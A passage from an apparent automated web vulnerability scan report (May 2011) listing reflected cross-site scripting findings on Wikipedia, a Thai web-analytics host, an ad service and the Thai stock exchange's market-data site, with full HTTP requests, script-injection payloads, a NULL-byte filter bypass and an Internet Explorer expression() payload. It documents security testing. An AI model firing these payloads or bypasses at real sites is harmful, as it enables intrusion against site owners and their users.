<title>Wikimedia page not found: http://en.wikipedia.org/wiki/w%006a3ca&quot;&gt;
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/w%006a3ca"><a>09100c96293/index.php?title=MediaWiki:JQuery-makeCollapsible.js&action=raw&ctype=text/javascript" title="Wikipedia:w%006a3ca">
...[SNIP]...

5.10. http://en.wikipedia.org/w/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /w/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ccdf<script>alert(1)</script>41a51be8def was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /w/index.php5ccdf<script>alert(1)</script>41a51be8def?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: clicktracking-session=Azl5D3ckV95i4uJietKetOWelKAgEVii3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:07 GMT
Server: Apache
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/w/index.php5ccdf<script>alert(1)</script>41a51be8def?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css
Content-Length: 5840
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq75.wikimedia.org
X-Cache-Lookup: MISS from sq75.wikimedia.org:3128
X-Cache: MISS from sq37.wikimedia.org
X-Cache-Lookup: MISS from sq37.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/w/index.php5ccdf&lt;scri
...[SNIP]...
<p style="font-weight: bold;">To check for "index.php5ccdf<script>alert(1)</script>41a51be8def?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/index.php5ccdf<script>
...[SNIP]...

5.11. http://en.wikipedia.org/w/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /w/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e430e"><script>alert(1)</script>92a7c8df217 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /w/index.phpe430e"><script>alert(1)</script>92a7c8df217?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: clicktracking-session=Azl5D3ckV95i4uJietKetOWelKAgEVii3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:07 GMT
Server: Apache
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/w/index.phpe430e"><script>alert(1)</script>92a7c8df217?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css
Content-Length: 5868
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq74.wikimedia.org
X-Cache-Lookup: MISS from sq74.wikimedia.org:3128
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/w/index.phpe430e&quot;&g
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/index.phpe430e"><script>alert(1)</script>92a7c8df217?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css" title="Wikipedia:index.phpe430e">
...[SNIP]...

5.12. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/List_of_banks_in_Thailand

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0049721"><script>alert(1)</script>64e72a0d07b was submitted in the REST URL parameter 2. This input was echoed as 49721"><script>alert(1)</script>64e72a0d07b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/List_of_banks_in_Thailand%0049721"><script>alert(1)</script>64e72a0d07b HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:15 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/List_of_banks_in_Thailand%0049721"><script>alert(1)</script>64e72a0d07b
Content-Length: 5546
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:3128
X-Cache: MISS from sq37.wikimedia.org
X-Cache-Lookup: MISS from sq37.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/List_of_banks_in_Th
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/List_of_banks_in_Thailand%0049721"><script>alert(1)</script>64e72a0d07b" title="Wikipedia:List_of_banks_in_Thailand%0049721">
...[SNIP]...

5.13. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/List_of_banks_in_Thailand

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00b0b10<script>alert(1)</script>e77afb03ed2 was submitted in the REST URL parameter 2. This input was echoed as b0b10<script>alert(1)</script>e77afb03ed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/List_of_banks_in_Thailand%00b0b10<script>alert(1)</script>e77afb03ed2 HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:31 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/List_of_banks_in_Thailand%00b0b10<script>alert(1)</script>e77afb03ed2
Content-Length: 5518
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:3128
X-Cache: MISS from sq66.wikimedia.org
X-Cache-Lookup: MISS from sq66.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/List_of_banks_in_Th
...[SNIP]...
<p style="font-weight: bold;">To check for "List_of_banks_in_Thailand%00b0b10<script>alert(1)</script>e77afb03ed2" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/List_of_banks_in_Thailand%00b0b10<script>
...[SNIP]...

5.14. http://hits.truehits.in.th/data/a0000000.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/a0000000.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bee8<script>alert(1)</script>f7077ef02aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data1bee8<script>alert(1)</script>f7077ef02aa/a0000000.js HTTP/1.1
Host: hits.truehits.in.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:23:26 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data1bee8<script>alert(1)</script>f7077ef02aa/a0000000.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.15. http://hits.truehits.in.th/data/a0000000.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/a0000000.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7bc6<script>alert(1)</script>1a4253461d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/a0000000.jsb7bc6<script>alert(1)</script>1a4253461d7 HTTP/1.1
Host: hits.truehits.in.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:23:57 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/a0000000.jsb7bc6<script>alert(1)</script>1a4253461d7<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.16. http://hits.truehits.in.th/data/c0002215.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/c0002215.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5b5f<script>alert(1)</script>1e6b28dd76e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /datac5b5f<script>alert(1)</script>1e6b28dd76e/c0002215.js HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:05 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /datac5b5f<script>alert(1)</script>1e6b28dd76e/c0002215.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.17. http://hits.truehits.in.th/data/c0002215.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/c0002215.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2134<script>alert(1)</script>824e9241823 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/c0002215.jsb2134<script>alert(1)</script>824e9241823 HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:45 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/c0002215.jsb2134<script>alert(1)</script>824e9241823<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.18. http://hits.truehits.in.th/data/f0010172.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/f0010172.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2d90<script>alert(1)</script>478965f6336 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /datad2d90<script>alert(1)</script>478965f6336/f0010172.js HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.kasikornbank.com/Pages/truehitsstat.html?pagename=(en)%20Menu%20Item%20Navigation:%20/EN/Pages/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:02 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /datad2d90<script>alert(1)</script>478965f6336/f0010172.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.19. http://hits.truehits.in.th/data/f0010172.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/f0010172.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f9de<script>alert(1)</script>8ec75f20213 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/f0010172.js6f9de<script>alert(1)</script>8ec75f20213 HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.kasikornbank.com/Pages/truehitsstat.html?pagename=(en)%20Menu%20Item%20Navigation:%20/EN/Pages/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:40 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/f0010172.js6f9de<script>alert(1)</script>8ec75f20213<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.20. http://hits.truehits.in.th/data/k0019767.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/k0019767.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2415b<script>alert(1)</script>b62dd18ea83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data2415b<script>alert(1)</script>b62dd18ea83/k0019767.js HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp?pagename=Home-En
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:02 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data2415b<script>alert(1)</script>b62dd18ea83/k0019767.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.21. http://hits.truehits.in.th/data/k0019767.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/k0019767.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1ee85<script>alert(1)</script>b1e27c80dab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/k0019767.js1ee85<script>alert(1)</script>b1e27c80dab HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp?pagename=Home-En
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:42 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/k0019767.js1ee85<script>alert(1)</script>b1e27c80dab<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.22. http://hits.truehits.in.th/data/q0027704.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/q0027704.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b971c<script>alert(1)</script>49310627741 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /datab971c<script>alert(1)</script>49310627741/q0027704.js HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:02 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /datab971c<script>alert(1)</script>49310627741/q0027704.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.23. http://hits.truehits.in.th/data/q0027704.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/q0027704.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ff223<script>alert(1)</script>b991743f981 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/q0027704.jsff223<script>alert(1)</script>b991743f981 HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:36 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/q0027704.jsff223<script>alert(1)</script>b991743f981<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.24. http://hits.truehits.in.th/data/s0028564.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/s0028564.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c6094<script>alert(1)</script>4230ec4251c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /datac6094<script>alert(1)</script>4230ec4251c/s0028564.js HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:06 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /datac6094<script>alert(1)</script>4230ec4251c/s0028564.js<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.25. http://hits.truehits.in.th/data/s0028564.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.truehits.in.th
Path:   /data/s0028564.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 994fa<script>alert(1)</script>64e761682ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/s0028564.js994fa<script>alert(1)</script>64e761682ca HTTP/1.1
Host: hits.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Connection: close
Date: Tue, 03 May 2011 13:16:44 GMT
Server: lighttpd
Content-Length: 3690

File Not Found /data/s0028564.js994fa<script>alert(1)</script>64e761682ca<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:red}
...[SNIP]...

5.26. http://html.aggregateknowledge.com/iframe [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload e1a16<x%20style%3dx%3aexpression(alert(1))>11e3fc89694 was submitted in the pid parameter. This input was echoed as e1a16<x style=x:expression(alert(1))>11e3fc89694 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /iframe?pid=32e1a16<x%20style%3dx%3aexpression(alert(1))>11e3fc89694&itemid=298028&senduuid=0&che=1304429183 HTTP/1.1
Host: html.aggregateknowledge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 03 May 2011 13:33:19 GMT
Connection: close


<!--
An Aggregate Knowledge internal error occurred; Unable to service request.
java.lang.IllegalArgumentException: Could not convert "32e1a16<x style=x:expression(alert(1))>11e3fc89694" to int / long.
   at net.agkn.module.common.parameter.ParameterDefinition.castSingleValue(ParameterDefinition.java:259)
   at net.agkn.module.common.parameter.ParameterDefinition.castValue(ParameterDefin
...[SNIP]...

5.27. http://marketdata.set.or.th/mkt/topten.do [country parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://marketdata.set.or.th
Path:   /mkt/topten.do

Issue detail

The value of the country request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccb4"><script>alert(1)</script>0cfb86634f2 was submitted in the country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mkt/topten.do?language=en&country=US9ccb4"><script>alert(1)</script>0cfb86634f2 HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/sitemap/for_listing.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:09:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Set-Cookie: JSESSIONID=8419F650CF8EC8FA9D40818B5034DEE6; Path=/mkt
Content-Length: 58713


<html>
<head>
<link href="/mkt/styles/setstyle.css;jsessionid=8419F650CF8EC8FA9D40818B5034DEE6" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...
<a href="stockquotation.do?symbol=BBL&language=en&country=US9CCB4"><SCRIPT>ALERT(1)</SCRIPT>0CFB86634F2">
...[SNIP]...

5.28. http://marketdata.set.or.th/mkt/topten.do [language parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://marketdata.set.or.th
Path:   /mkt/topten.do

